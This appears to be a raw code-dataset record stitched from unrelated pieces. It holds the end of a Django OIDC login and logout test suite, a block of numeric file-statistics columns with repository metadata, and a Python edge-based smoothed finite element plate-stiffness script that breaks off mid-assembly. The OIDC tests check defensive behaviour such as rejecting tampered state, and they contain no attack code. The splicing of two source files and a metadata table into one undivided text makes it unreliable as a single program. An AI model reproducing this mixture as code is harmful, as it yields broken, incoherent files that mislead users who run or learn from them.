    @unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_FAILURE_REDIRECT_URI', '/fail')
    def test_can_redirect_the_to_a_failure_page_if_he_is_not_active(
            self, mocked_login, mocked_authenticate, client):
        user = User.objects.create_user('foo')
        user.is_active = False
        user.save()
        mocked_authenticate.return_value = user
        self._prepare_session(client, oidc_auth_state='dummystate',
                              oidc_auth_nonce='dummynonce')
        url = reverse('oidc_auth_callback')
        response = client.get(url, {'code': 'dummycode', 'state': 'dummystate'})
        assert response.status_code == 302
        assert response.url == '/fail'
        assert mocked_authenticate.call_count == 1
        assert not mocked_login.call_count

    @unittest.mock.patch('django.contrib.auth.authenticate')
    @unittest.mock.patch('django.contrib.auth.login')
    @unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_FAILURE_REDIRECT_URI', '/fail')
    def test_raises_if_the_state_has_been_tampered_with(
            self, mocked_login, mocked_authenticate, client):
        user = User.objects.create_user('foo')
        mocked_authenticate.return_value = user
        # The stored state differs from the one echoed back by the provider.
        self._prepare_session(client, oidc_auth_state='validstate',
                              oidc_auth_nonce='dummynonce')
        url = reverse('oidc_auth_callback')
        response = client.get(url, {'code': 'dummycode', 'state': 'dummystate'})
        assert response.status_code == 400  # suspicious operation
        assert not mocked_authenticate.call_count
        assert not mocked_login.call_count

    @unittest.mock.patch('django.contrib.auth.authenticate')
    @unittest.mock.patch('django.contrib.auth.login')
    @unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_REDIRECT_URI', '/success')
    def test_removes_nonce_from_user_session_upon_user_authentication(
            self, mocked_login, mocked_authenticate, client):
        user = User.objects.create_user('foo')
        mocked_authenticate.return_value = user
        self._prepare_session(client, oidc_auth_state='dummystate',
                              oidc_auth_nonce='dummynonce')
        url = reverse('oidc_auth_callback')
        response = client.get(url, {'code': 'dummycode', 'state': 'dummystate'})
        assert response.status_code == 302
        assert response.url == '/success'
        assert mocked_authenticate.call_count == 1
        assert mocked_login.call_count == 1
        assert 'oidc_auth_state' in client.session
        assert 'oidc_auth_nonce' not in client.session

    @unittest.mock.patch('django.contrib.auth.authenticate')
    @unittest.mock.patch('django.contrib.auth.login')
    @unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_REDIRECT_URI', '/success')
    def test_stores_the_session_state_if_applicable(
            self, mocked_login, mocked_authenticate, client):
        user = User.objects.create_user('foo')
        mocked_authenticate.return_value = user
        self._prepare_session(client, oidc_auth_state='dummystate',
                              oidc_auth_nonce='dummynonce')
        url = reverse('oidc_auth_callback')
        response = client.get(
            url, {'code': 'dummycode', 'state': 'dummystate', 'session_state': 'thisisatest', })
        assert response.status_code == 302
        assert response.url == '/success'
        assert mocked_authenticate.call_count == 1
        assert mocked_login.call_count == 1
        assert client.session['oidc_auth_session_state'] == 'thisisatest'

    @unittest.mock.patch('django.contrib.auth.logout')
    @unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_FAILURE_REDIRECT_URI', '/fail')
    def test_logout_the_current_user_if_the_authentication_failed_on_the_op(
            self, mocked_logout, client):
        self._prepare_session(client, oidc_auth_state='dummystate',
                              oidc_auth_nonce='dummynonce')
        url = reverse('oidc_auth_callback')
        response = client.get(url, {'error': 'login_required', })
        assert response.status_code == 302
        assert response.url == '/fail'
        assert mocked_logout.call_count == 1
@pytest.mark.django_db
class TestOIDCEndSessionView:
    """Tests for the view terminating the local and provider sessions."""

    @unittest.mock.patch('django.contrib.auth.logout')
    @unittest.mock.patch('oidc_rp.conf.settings.PROVIDER_END_SESSION_ENDPOINT',
                         'http://example.com/a/end-session')
    def test_can_log_out_a_user_from_the_application_and_the_authorization_server(
            self, mocked_logout, client):
        User.objects.create_user('foo', password='insecure')
        client.login(username='foo', password='insecure')
        session = client.session
        session['oidc_auth_id_token'] = 'idtoken'
        session.save()
        response = client.get(reverse('oidc_end_session'), follow=False)
        assert response.status_code == 302
        assert response.url.startswith('http://example.com/a/end-session')
        # The provider redirect must carry both the return URL and the token hint.
        query = parse_qs(urlparse(response.url).query)
        assert query['post_logout_redirect_uri'] == ['http://testserver/', ]
        assert query['id_token_hint'] == ['idtoken', ]
        assert mocked_logout.call_count == 1

    @unittest.mock.patch('django.contrib.auth.logout')
    @override_settings(LOGOUT_REDIRECT_URL='/logout')
    def test_can_log_out_a_user_from_the_application_without_end_session_endpoint(
            self, mocked_logout, client):
        User.objects.create_user('foo', password='insecure')
        client.login(username='foo', password='insecure')
        response = client.get(reverse('oidc_end_session'), follow=False)
        assert response.status_code == 302
        assert response.url == '/logout'
        assert mocked_logout.call_count == 1

    @unittest.mock.patch('django.contrib.auth.logout')
    @override_settings(LOGOUT_REDIRECT_URL='/logout')
    def test_silently_works_for_anonymous_users(self, mocked_logout, client):
        # No logged-in user: the view must still redirect without calling logout.
        response = client.get(reverse('oidc_end_session'), follow=False)
        assert response.status_code == 302
        assert response.url == '/logout'
        assert not mocked_logout.call_count
| 48.773649
| 97
| 0.692872
| 1,706
| 14,437
| 5.566237
| 0.091442
| 0.037068
| 0.066238
| 0.05813
| 0.871525
| 0.853939
| 0.844882
| 0.842565
| 0.842565
| 0.842565
| 0
| 0.00601
| 0.193253
| 14,437
| 295
| 98
| 48.938983
| 0.809307
| 0.001385
| 0
| 0.802198
| 0
| 0
| 0.221713
| 0.095179
| 0
| 0
| 0
| 0
| 0.274725
| 1
| 0.065934
| false
| 0.014652
| 0.021978
| 0
| 0.098901
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2827e00d1b2cfaecf1d4d73d08fe73157f13de3e
| 153,233
|
py
|
Python
|
scratch/espim_example.py
|
compmech/particles
|
d23ae69ad4c79024b997a232247b4ae0e1e7031c
|
[
"BSD-2-Clause"
] | 8
|
2017-06-16T15:50:43.000Z
|
2021-12-01T10:20:36.000Z
|
scratch/espim_example.py
|
compmech/particles
|
d23ae69ad4c79024b997a232247b4ae0e1e7031c
|
[
"BSD-2-Clause"
] | 2
|
2017-12-27T11:07:04.000Z
|
2019-01-22T19:34:33.000Z
|
scratch/espim_example.py
|
compmech/particles
|
d23ae69ad4c79024b997a232247b4ae0e1e7031c
|
[
"BSD-2-Clause"
] | 4
|
2017-05-17T17:53:20.000Z
|
2019-04-03T01:57:58.000Z
|
"""ES-PIM
- prevents non-zero energy spurious modes for vibration / buckling analysis as
NS-PIM
- compared to SFEM using TRIA3, this approach is very similar, but much easily
extented to n-sided elements, since the integration is performed edge-wise
- results more precise than FEM using QUAD4 elements
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.sparse import coo_matrix
from pim.composite.laminate import read_stack
from pim.sparse import solve, is_symmetric
XGLOBAL = np.array([1., 0, 0])
YGLOBAL = np.array([0, 1., 0])
ZGLOBAL = np.array([0, 0, 1.])
def area_of_polygon(x, y):
    """Return the area of an arbitrary 2D polygon given its vertices.

    Uses the shoelace formula; the vertex ordering (CW or CCW) does not
    matter because the absolute value is taken.
    """
    twice_area = 0.0
    for j in range(len(x)):
        twice_area += x[j - 1] * (y[j] - y[j - 2])
    return abs(twice_area) / 2.0
def unitvec(vector):
    """Return *vector* rescaled to unit Euclidean length."""
    norm = np.linalg.norm(vector)
    return vector / norm
class Property(object):
    """Container for the laminate stiffness matrices A, B, D and E."""

    def __init__(self, A, B, D, E):
        # Stored verbatim; no copies or validation are performed.
        self.A, self.B, self.D, self.E = A, B, D, E
class IntegrationPoint(object):
    """One integration point on the boundary of an edge smoothing domain."""

    def __init__(self, tria, n1, n2, n3, f1, f2, f3, nx, ny, nz, le):
        # Position interpolated from the three tria nodes with area
        # coordinates f1, f2, f3 (they sum to 1).
        self.pos = (f1*n1 + f2*n2 + f3*n3).pos
        self.tria = tria
        self.n1, self.n2, self.n3 = n1, n2, n3
        self.f1, self.f2, self.f3 = f1, f2, f3
        # Outward normal of the boundary segment (3D case includes nz).
        self.nx, self.ny, self.nz = nx, ny, nz
        # Length of the line segment the integration point lies on.
        self.le = le
class Tria(object):
    """Linear three-node triangle element."""

    def __init__(self, n1, n2, n3):
        self.n1, self.n2, self.n3 = n1, n2, n3
        self.edges = []
        self.nodes = [n1, n2, n3]
        # Element area from the in-plane (x, y) node coordinates.
        xs = [node.pos[0] for node in self.nodes]
        ys = [node.pos[1] for node in self.nodes]
        self.Ae = area_of_polygon(xs, ys)
        self.prop = None  # either define here or in Node

    def getMid(self):
        """Return the centroid of the triangle as a new Node."""
        return 1/3*(self.n1 + self.n2 + self.n3)
class Edge(object):
    """Mesh edge; the owner of one edge-based smoothing domain."""

    def __init__(self, n1, n2):
        self.n1, self.n2 = n1, n2
        self.nodes = [n1, n2]
        self.trias = []
        self.sdomain = []
        self.ipts = []
        self.Ac = None  # smoothing-cell area, filled by the domain builder

    def getMid(self):
        """Return the midpoint of the edge."""
        return 0.5*(self.n1 + self.n2)
class Node(object):
    """Mesh node with a 3D position and its mesh connectivity.

    Supports elementwise arithmetic (``+``, ``-``, ``*``) against other
    nodes and against scalars/arrays, always returning a new Node.

    Bug fix: the original defined ``__rmul__`` plus a method named
    ``__lmul__`` — which is NOT a Python operator hook — so ``node * 2``
    raised TypeError while ``2 * node`` worked.  ``__mul__`` is now defined
    properly; ``__lmul__`` is kept as an alias for any explicit callers.
    """

    def __init__(self, x, y, z):
        self.pos = np.array([x, y, z], dtype=float)
        self.edges = set()
        self.trias = set()
        self.sdomain = None
        self.index = None
        self.prop = None  # either define here or in Tria

    def __add__(self, val):
        if isinstance(val, Node):
            return Node(*(self.pos + val.pos))
        return Node(*(self.pos + val))

    def __sub__(self, val):
        if isinstance(val, Node):
            return Node(*(self.pos - val.pos))
        return Node(*(self.pos - val))

    def __mul__(self, val):
        if isinstance(val, Node):
            return Node(*(self.pos * val.pos))
        return Node(*(self.pos * val))

    # Multiplication is commutative here, so reuse __mul__.
    def __rmul__(self, val):
        return self.__mul__(val)

    def __lmul__(self, val):
        # Kept for backward compatibility with any explicit callers.
        return self.__rmul__(val)
# Plate dimensions (a x b rectangle).
a = 10.
b = 5.
plt.figure(dpi=300)
# Regular 4 x 4 grid of nodes covering the plate.
nodes = np.array([
    Node(0, 0, 0),
    Node(a/3, 0, 0),
    Node(2*a/3, 0, 0),
    Node(a, 0, 0),
    Node(0, b/3, 0),
    Node(a/3, b/3, 0),
    Node(2*a/3, b/3, 0),
    Node(a, b/3, 0),
    Node(0, 2*b/3, 0),
    Node(a/3, 2*b/3, 0),
    Node(2*a/3, 2*b/3, 0),
    Node(a, 2*b/3, 0),
    Node(0, b, 0),
    Node(a/3, b, 0),
    Node(2*a/3, b, 0),
    Node(a, b, 0),
])
# Two triangles per grid cell (18 elements total).
trias = [
    Tria(nodes[0], nodes[1], nodes[5]),
    Tria(nodes[1], nodes[2], nodes[6]),
    Tria(nodes[2], nodes[3], nodes[7]),
    Tria(nodes[0], nodes[5], nodes[4]),
    Tria(nodes[1], nodes[6], nodes[5]),
    Tria(nodes[2], nodes[7], nodes[6]),
    Tria(nodes[4], nodes[5], nodes[9]),
    Tria(nodes[5], nodes[6], nodes[10]),
    Tria(nodes[6], nodes[7], nodes[11]),
    Tria(nodes[4], nodes[9], nodes[8]),
    Tria(nodes[5], nodes[10], nodes[9]),
    Tria(nodes[6], nodes[11], nodes[10]),
    Tria(nodes[8], nodes[9], nodes[13]),
    Tria(nodes[9], nodes[10], nodes[14]),
    Tria(nodes[10], nodes[11], nodes[15]),
    Tria(nodes[8], nodes[13], nodes[12]),
    Tria(nodes[9], nodes[14], nodes[13]),
    Tria(nodes[10], nodes[15], nodes[14]),
]
# Every unique edge of the triangulation (grid edges plus cell diagonals).
edges = np.array([
    Edge(nodes[0], nodes[1]),
    Edge(nodes[1], nodes[2]),
    Edge(nodes[2], nodes[3]),
    Edge(nodes[0], nodes[4]),
    Edge(nodes[1], nodes[5]),
    Edge(nodes[2], nodes[6]),
    Edge(nodes[3], nodes[7]),
    Edge(nodes[0], nodes[5]),
    Edge(nodes[1], nodes[6]),
    Edge(nodes[2], nodes[7]),
    Edge(nodes[4], nodes[5]),
    Edge(nodes[5], nodes[6]),
    Edge(nodes[6], nodes[7]),
    Edge(nodes[4], nodes[8]),
    Edge(nodes[5], nodes[9]),
    Edge(nodes[6], nodes[10]),
    Edge(nodes[7], nodes[11]),
    Edge(nodes[4], nodes[9]),
    Edge(nodes[5], nodes[10]),
    Edge(nodes[6], nodes[11]),
    Edge(nodes[8], nodes[9]),
    Edge(nodes[9], nodes[10]),
    Edge(nodes[10], nodes[11]),
    Edge(nodes[8], nodes[12]),
    Edge(nodes[9], nodes[13]),
    Edge(nodes[10], nodes[14]),
    Edge(nodes[11], nodes[15]),
    Edge(nodes[8], nodes[13]),
    Edge(nodes[9], nodes[14]),
    Edge(nodes[10], nodes[15]),
    Edge(nodes[12], nodes[13]),
    Edge(nodes[13], nodes[14]),
    Edge(nodes[14], nodes[15]),
])
# Build the node/edge/tria connectivity and draw the mesh edges.
for edge in edges:
    edge.n1.edges.add(edge)
    edge.n2.edges.add(edge)
    plt.plot([edge.n1.pos[0], edge.n2.pos[0]],
             [edge.n1.pos[1], edge.n2.pos[1]], '--k', lw=0.5, mfc=None)
    # A tria is adjacent to this edge when it shares both edge nodes.
    for tria in trias:
        if len(set(edge.nodes) & set(tria.nodes)) == 2:
            tria.edges.append(edge)
            edge.trias.append(tria)
            # NOTE(review): nesting reconstructed from a whitespace-stripped
            # source; sets make the repeated adds idempotent, so placing this
            # inside the `if` does not change the final connectivity.
            for node in tria.nodes:
                node.trias.add(tria)
# __________________________________________________________________
#
# the code above will come from an external triangulation algorithm
# __________________________________________________________________
#
# FOCUS HERE AND BELOW
# __________________________________________________________________
# Build, for every edge, its smoothing domain (a polygon joining the edge's
# end nodes and the centroid(s) of the adjacent triangle(s)) and the
# integration points on that polygon's boundary.
# NOTE(review): this looks like an edge-based smoothed FEM (ES-FEM)
# smoothing-cell construction — confirm against the reference being followed.
for edge in edges:
    # one adjacent triangle => boundary edge; two => interior edge
    if len(edge.trias) == 1:
        tria1 = edge.trias[0]
        tria2 = None
        # the triangle vertex that does not belong to the edge
        othernode1 = (set(tria1.nodes) - set(edge.nodes)).pop()
        mid1 = tria1.getMid()
    elif len(edge.trias) == 2:
        tria1 = edge.trias[0]
        tria2 = edge.trias[1]
        othernode1 = (set(tria1.nodes) - set(edge.nodes)).pop()
        othernode2 = (set(tria2.nodes) - set(edge.nodes)).pop()
        mid1 = tria1.getMid()
        mid2 = tria2.getMid()
    else:
        raise NotImplementedError('ntrias != 1 or 2 for an edge')
    node1 = edge.nodes[0]
    node2 = edge.nodes[1]
    ipts = []     # integration points, one per boundary segment of the cell
    sdomain = []  # vertices of the smoothing-domain polygon (closed: last == first)
    # to guarantee outward normals
    sign = 1
    if np.dot(np.cross((mid1 - node2).pos, (node1 - node2).pos), ZGLOBAL) < 0:
        sign = -1
    # segment node1 -> mid1: normal is the segment vector rotated by the
    # (signed) global z axis, integration point weighted 2/3, 1/6, 1/6
    tmpvec = (node1 - mid1).pos
    nx, ny, nz = unitvec(np.cross(tmpvec, sign*ZGLOBAL))
    sdomain.append(node1)
    sdomain.append(mid1)
    le = np.sqrt(((node1.pos - mid1.pos)**2).sum())
    ipt = IntegrationPoint(tria1, node1, node2, othernode1, 2/3, 1/6, 1/6, nx, ny, nz, le)
    ipts.append(ipt)
    #NOTE check only if for distorted meshes these ratios 2/3, 1/6, 1/6 are
    # still valid
    #ipt = ipts[-1]
    #A1 = area_of_polygon([node1.pos[0], node2.pos[0], othernode1.pos[0]],
    #[node1.pos[1], node2.pos[1], othernode1.pos[1]])
    #fA1 = area_of_polygon([ipt.pos[0], node2.pos[0], othernode1.pos[0]],
    #[ipt.pos[1], node2.pos[1], othernode1.pos[1]])
    #print('DEBUG area: %1.3f = %1.3f' % (fA1/A1, 2/3))
    # segment mid1 -> node2
    tmpvec = (mid1 - node2).pos
    nx, ny, nz = unitvec(np.cross(tmpvec, sign*ZGLOBAL))
    sdomain.append(node2)
    le = np.sqrt(((mid1.pos - node2.pos)**2).sum())
    ipt = IntegrationPoint(tria1, node1, node2, othernode1, 1/6, 2/3, 1/6, nx, ny, nz, le)
    ipts.append(ipt)
    if tria2 is None:
        # boundary edge: close the polygon straight back along the edge
        # itself (integration point sits at the edge mid-line: 1/2, 1/2, 0)
        tmpvec = (node2 - node1).pos
        nx, ny, nz = unitvec(np.cross(tmpvec, sign*ZGLOBAL))
        sdomain.append(node1)
        le = np.sqrt(((node2.pos - node1.pos)**2).sum())
        ipt = IntegrationPoint(tria1, node1, node2, othernode1, 1/2, 1/2, 0, nx, ny, nz, le)
        ipts.append(ipt)
    else:
        # interior edge: close the polygon through the second triangle's
        # centroid (segments node2 -> mid2 and mid2 -> node1)
        tmpvec = (node2 - mid2).pos
        nx, ny, nz = unitvec(np.cross(tmpvec, sign*ZGLOBAL))
        sdomain.append(mid2)
        le = np.sqrt(((node2.pos - mid2.pos)**2).sum())
        ipt = IntegrationPoint(tria2, node1, node2, othernode2, 1/6, 2/3, 1/6, nx, ny, nz, le)
        ipts.append(ipt)
        tmpvec = (mid2 - node1).pos
        nx, ny, nz = unitvec(np.cross(tmpvec, sign*ZGLOBAL))
        sdomain.append(node1)
        le = np.sqrt(((mid2.pos - node1.pos)**2).sum())
        ipt = IntegrationPoint(tria2, node1, node2, othernode2, 2/3, 1/6, 1/6, nx, ny, nz, le)
        ipts.append(ipt)
    edge.sdomain = sdomain
    # smoothing-cell area; sdomain[:-1] drops the repeated closing vertex
    edge.Ac = area_of_polygon([sr.pos[0] for sr in sdomain[:-1]],
                              [sr.pos[1] for sr in sdomain[:-1]])
    edge.ipts = ipts
    # plot the smoothing-cell outline and mark its integration points
    xcoord = [pt.pos[0] for pt in sdomain]
    ycoord = [pt.pos[1] for pt in sdomain]
    plt.plot(xcoord, ycoord, '-k', lw=0.25)
    xcoord = [ipt.pos[0] for ipt in ipts]
    ycoord = [ipt.pos[1] for ipt in ipts]
    plt.plot(xcoord, ycoord, 'xk', mew=0.25, mfc='None')
# Scatter-plot all mesh nodes on top of the edge/cell drawing, with equal
# x/y scaling so the mesh geometry is not distorted.
coords = np.array([nd.pos[:2] for nd in nodes])
xcord = coords[:, 0].tolist()
ycord = coords[:, 1].tolist()
plt.scatter(xcord, ycord)
plt.gca().set_aspect('equal')
# ASSEMBLING GLOBAL MATRICES
# renumbering nodes using Liu's suggested algorithm
# - sorting nodes from a minimum spatial position to a maximum one
# - each Node object will carry an index that will position it in the global
#   stiffness matrix
# Bandwidth-reducing renumbering: sort nodes by squared distance from the
# minimum corner of the bounding box.
# NOTE(review): the sorted ordering is computed but currently DISABLED —
# the active loop numbers nodes in their original order, so `indices` and
# `ind2node` end up unused here (see the commented-out lines below).
nodes_xyz = np.array([n.pos for n in nodes])
index_ref_point = nodes_xyz.min(axis=0)  # minimum spatial position
index_dist = ((nodes_xyz - index_ref_point)**2).sum(axis=-1)
indices = np.argsort(index_dist)
ind2node = {}
for i, node in enumerate(nodes):
    # position of this node's dof block in the global stiffness matrix
    node.index = i
    #node.index = indices[i]
    #ind2node[node.index] = node
n = nodes.shape[0]  # number of nodes
dof = 5  # degrees of freedom per node (presumably u, v, w + 2 rotations — TODO confirm)
# material properties — single layer; read_stack/laminaprop suggest a
# composite-laminate property builder (ABDE matrices)
E11 = 71.e9
nu = 0.33
plyt = 0.01  # ply thickness
lam = read_stack([0], plyt=plyt, laminaprop=(E11, E11, nu))
prop = Property(lam.A, lam.B, lam.D, lam.E)
# every triangle shares the same property set for now
for tria in trias:
    tria.prop = prop
#TODO allocate less memory here... (k0 is dense n*dof x n*dof; sparse would scale better)
k0 = np.zeros((n*dof, n*dof), dtype=np.float64)
prop_from_node = False  # if True, average properties from nodes (branch below is a stub)
count = 0
Atotal = 0  # accumulated smoothing-cell area (sanity check against total mesh area)
# Assemble each edge smoothing cell's contribution into the global
# stiffness matrix k0 (the k0[...] += ... lines continue below).
for edge in edges:
    # NOTE(review): n1/n2 are not used in this visible part of the loop —
    # possibly used further down; verify before removing.
    n1 = edge.nodes[0]
    n2 = edge.nodes[1]
    Ac = edge.Ac
    Atotal += Ac
    ipts = edge.ipts
    for ipt in ipts:
        if True:  # debug toggle
            # plotting arrows indicating normals for each integration point
            # NOTE(review): 'tria' here is the stale loop variable left over
            # from the earlier 'for tria in trias' loop, so every arrow is
            # scaled by that last triangle's area — probably meant ipt.tria;
            # confirm before relying on the arrow lengths.
            A1 = area_of_polygon([tria.n1.pos[0], tria.n2.pos[0], tria.n3.pos[0]],
            [tria.n1.pos[1], tria.n2.pos[1], tria.n3.pos[1]])
            f = 0.05
            la = A1**0.5/8
            plt.arrow(ipt.pos[0]-la*ipt.nx, ipt.pos[1]-la*ipt.ny,
            f*ipt.nx, f*ipt.ny, head_width=0.05,
            head_length=0.05, fc='k', ec='k')
    # global node indices touched by this cell: 3 for a boundary edge,
    # 4 for an interior edge
    indices = set()
    for ipt in ipts:
        indices.add(ipt.n1.index)
        indices.add(ipt.n2.index)
        indices.add(ipt.n3.index)
    indices = sorted(list(indices))
    if len(ipts) == 3:
        indices.append(-1) # fourth dummy index
        # NOTE(review): the dummy -1 index makes i4*dof address the END of
        # k0 via negative indexing; the f4 weights stay zero so only zeros
        # are added there, but it is worth confirming this is intentional.
    indexpos = dict([[ind, i] for i, ind in enumerate(indices)])
    i1, i2, i3, i4 = indices
    # f1..f4: shape-function values of the (up to) four cell nodes at each
    # of the four boundary integration points, zero-padded for boundary cells
    f1 = [0, 0, 0, 0]
    f2 = [0, 0, 0, 0]
    f3 = [0, 0, 0, 0]
    f4 = [0, 0, 0, 0]
    nx1 = ipts[0].nx
    ny1 = ipts[0].ny
    le1 = ipts[0].le
    f1[indexpos[ipts[0].n1.index]] = ipts[0].f1
    f1[indexpos[ipts[0].n2.index]] = ipts[0].f2
    f1[indexpos[ipts[0].n3.index]] = ipts[0].f3
    nx2 = ipts[1].nx
    ny2 = ipts[1].ny
    le2 = ipts[1].le
    # NOTE(review): the next three assignments are dead code — f21/f22/f23
    # are overwritten by the tuple unpacking of f2 below before any use.
    f21 = ipts[1].f1
    f22 = ipts[1].f2
    f23 = ipts[1].f3
    f2[indexpos[ipts[1].n1.index]] = ipts[1].f1
    f2[indexpos[ipts[1].n2.index]] = ipts[1].f2
    f2[indexpos[ipts[1].n3.index]] = ipts[1].f3
    nx3 = ipts[2].nx
    ny3 = ipts[2].ny
    le3 = ipts[2].le
    f3[indexpos[ipts[2].n1.index]] = ipts[2].f1
    f3[indexpos[ipts[2].n2.index]] = ipts[2].f2
    f3[indexpos[ipts[2].n3.index]] = ipts[2].f3
    # boundary cells have only 3 integration points; the fourth slot is
    # padded with zeros so the same assembly expressions work for both cases
    if len(ipts) == 3:
        nx4 = 0
        ny4 = 0
        le4 = 0
    else:
        nx4 = ipts[3].nx
        ny4 = ipts[3].ny
        le4 = ipts[3].le
        f4[indexpos[ipts[3].n1.index]] = ipts[3].f1
        f4[indexpos[ipts[3].n2.index]] = ipts[3].f2
        f4[indexpos[ipts[3].n3.index]] = ipts[3].f3
    f11, f12, f13, f14 = f1
    f21, f22, f23, f24 = f2
    f31, f32, f33, f34 = f3
    f41, f42, f43, f44 = f4
    #FIXME do some weighted average on A, B, D
    # either use properties from tria or nodes
    if prop_from_node:
        pass
        #A = f1*ipt.n1.prop.A + f2*ipt.n2.prop.A + f3*ipt.n3.prop.A
        #B = f1*ipt.n1.prop.B + f2*ipt.n2.prop.B + f3*ipt.n3.prop.B
        #D = f1*ipt.n1.prop.D + f2*ipt.n2.prop.D + f3*ipt.n3.prop.D
        #E = f1*ipt.n1.prop.E + f2*ipt.n2.prop.E + f3*ipt.n3.prop.E
    else:
        # laminate stiffness matrices from the first integration point's tria
        A = ipts[0].tria.prop.A
        B = ipts[0].tria.prop.B
        D = ipts[0].tria.prop.D
    # scalar components of the A (membrane), B (coupling) and D (bending)
    # matrices, used in the long assembly expressions below
    A11 = A[0, 0]
    A12 = A[0, 1]
    A16 = A[0, 2]
    A22 = A[1, 1]
    A26 = A[1, 2]
    A66 = A[2, 2]
    B11 = B[0, 0]
    B12 = B[0, 1]
    B16 = B[0, 2]
    B22 = B[1, 1]
    B26 = B[1, 2]
    B66 = B[2, 2]
    D11 = D[0, 0]
    D12 = D[0, 1]
    D16 = D[0, 2]
    D22 = D[1, 1]
    D26 = D[1, 2]
    D66 = D[2, 2]
    #TODO calculate only upper triangle
k0[i1*dof+0, i1*dof+0] += Ac*((A11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+0, i1*dof+1] += Ac*((A12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+0, i1*dof+3] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+0, i1*dof+4] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+0, i2*dof+0] += Ac*((A11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i1*dof+0, i2*dof+1] += Ac*((A12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + A66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+0, i2*dof+3] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
